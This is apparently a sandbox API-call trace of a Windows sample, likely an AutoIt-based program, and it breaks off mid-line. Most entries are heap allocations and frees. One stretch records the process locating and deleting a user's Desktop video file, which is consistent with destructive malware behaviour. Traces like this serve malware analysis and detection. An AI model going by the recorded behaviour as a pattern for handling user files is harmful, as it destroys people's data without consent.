1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.420] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.421] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.421] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.421] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0032.421] FreeLibrary (hLibModule=0x76e10000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0032.421] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFilePart=0x0) returned 0x2e [0032.421] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.421] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x1334a7e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0x7c2100 [0032.421] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ZUXz.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\zuxz.avi")) returned 1 [0032.423] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0113040, ftCreationTime.dwHighDateTime=0x1d5c55d, ftLastAccessTime.dwLowDateTime=0x9efc70e0, ftLastAccessTime.dwHighDateTime=0x1d5c21a, ftLastWriteTime.dwLowDateTime=0x1334a7e0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x151e7, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="ZUXz.avi", cAlternateFileName="")) returned 0 [0032.423] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a9d8 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.423] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0032.423] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.424] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ffb0 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0032.426] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.426] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.426] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0032.427] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af478 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc88 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0032.427] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.427] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.427] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0032.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.428] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.428] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0032.428] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.428] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0032.429] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.429] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.430] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0032.430] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0032.430] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0032.430] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, 